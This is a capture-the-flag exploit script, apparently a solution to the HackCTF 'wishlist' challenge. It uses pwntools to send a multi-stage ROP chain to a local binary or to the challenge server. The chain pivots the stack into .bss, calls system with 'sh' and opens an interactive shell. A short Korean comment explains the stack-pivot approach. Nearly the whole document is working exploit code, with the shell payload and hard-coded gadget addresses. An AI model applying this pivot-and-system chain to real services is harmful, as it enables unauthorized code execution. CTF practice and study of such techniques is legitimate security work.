
[hackctf] wishlist

import sys
from pwn import *
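if len(sys.argv) != 2:
    # Usage error. sys.exit() with a string writes it to stderr and returns
    # status 1, so a wrapper can tell a bad invocation from a normal run;
    # the bare exit() builtin is only present when site.py has been loaded.
    sys.exit("sys.argv[1] = r : remote l : local")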
#context.log_level = 'debug'
def make(wishlist):
    """Drive menu option 1: add an entry whose body is ``str(wishlist)``.

    Talks to the module-level tube ``p`` (set up further down in the script).
    """
    exchange = (
        ('input:', '1'),
        ('wishlist:', str(wishlist)),
    )
    for prompt, answer in exchange:
        p.sendafter(prompt, answer)
def view(index):
    """Drive menu option 2: display the entry stored at *index*.

    The index is sent as text over the module-level tube ``p``.
    """
    choice, position = '2', str(index)
    p.sendafter('input:', choice)
    p.sendafter('index:', position)
def remove(index):
    """Drive menu option 3: delete the entry stored at *index*.

    Uses the module-level tube ``p``; the index is sent as text.
    """
    prompts = ('input:', 'index:')
    answers = ('3', str(index))
    for prompt, answer in zip(prompts, answers):
        p.sendafter(prompt, answer)
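# Target selection: 'l' runs the binary locally, 'r' connects to the remote
# service. The mode is stripped once and reused for the libc choice below.
mode = sys.argv[1].strip()
if mode == 'l':
    p = process('./wishlist')
elif mode == 'r':
    p = remote('ctf.j0n9hyun.xyz', 3035)
else:
    # Any other value used to leave `p` undefined and fail later with a
    # NameError on the first send; reject it here with the same usage text.
    sys.exit("sys.argv[1] = r : remote l : local")
e = ELF('./wishlist')
# libc handle for the chosen target. `l` is not referenced further down in
# this script; it is kept for interactive use / debugging.
if mode == 'l':
    l = e.libc
elif mode == 'r':
    l = ELF('/lib/x86_64-linux-gnu/libc.so.6')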
pause()  # pwntools pause(): waits for the operator before anything is sent
# Location of the fake stack: e.bss() plus a generous offset. The author's
# note below says the dynamic-linker resolver uses a lot of stack, which is
# why the offset is this large.
bss = e.bss() + 0x800
# Absolute addresses taken from the binary (0x400... range, so presumably a
# non-PIE build); they must be re-checked if the binary is rebuilt or moved.
# `Read` is jumped to before every p.send() below, so it appears to be the
# program's input routine — not verified here.
Read = 0x4008BE
gadget1 = 0x0000000000400b03 # pop rdi ; ret
gadget2 = 0x40097d # pop rbp ; ret
leave_ret = 0x4008D8  # leave ; ret (per the name; not verified here)
main = 0x400A4C  # not used anywhere below
log.info("bss : " + hex(bss))
# NOTE(review): every address below is hard-coded and the libc path is fixed,
# so this sequence only works against this exact build; PIE/ASLR, a stack
# canary, or a different libc build would break it.
# Send 1: 0x10 bytes of filler, then `bss`, then `Read` — the values that
# presumably land on the saved frame pointer and return address.
pay = 'a' * 0x10
pay += p64(bss)
pay += p64(Read)
p.sendafter('input:', pay)
# Send 2: pop rdi gadget, address of "sh\0" inside the binary, bss + 0x10,
# and Read again.
pay = p64(gadget1)
pay += p64(next(e.search("sh\x00")))
pay += p64(bss + 0x10)
pay += p64(Read)
sleep(0.1)  # presumably keeps consecutive sends from being merged into one read
p.send(pay)
# Send 3: system@plt, pop rbp gadget, bss + 0x20, and Read once more.
pay = p64(e.plt['system'])
pay += p64(gadget2)
pay += p64(bss + 0x20)
pay += p64(Read)
sleep(0.1)
p.send(pay)
# Send 4: bss + 0x50, pop rbp gadget, bss - 0x18, then leave;ret. The role
# of the bss + 0x50 qword is not obvious from this script alone.
pay = p64(bss + 0x50)
pay += p64(gadget2)
pay += p64(bss - 0x10 - 8)
pay += p64(leave_ret)
sleep(0.1)
p.send(pay)
p.interactive()

스택 피보팅만 잘하면 풀 수 있다. 여기서 system 함수의 실제 주소를 찾는 dl 어쩌구가 스택을 많이 쓰기 때문에, 적당히 bss + 0x800 정도로 잡아서 쓰면 된다.
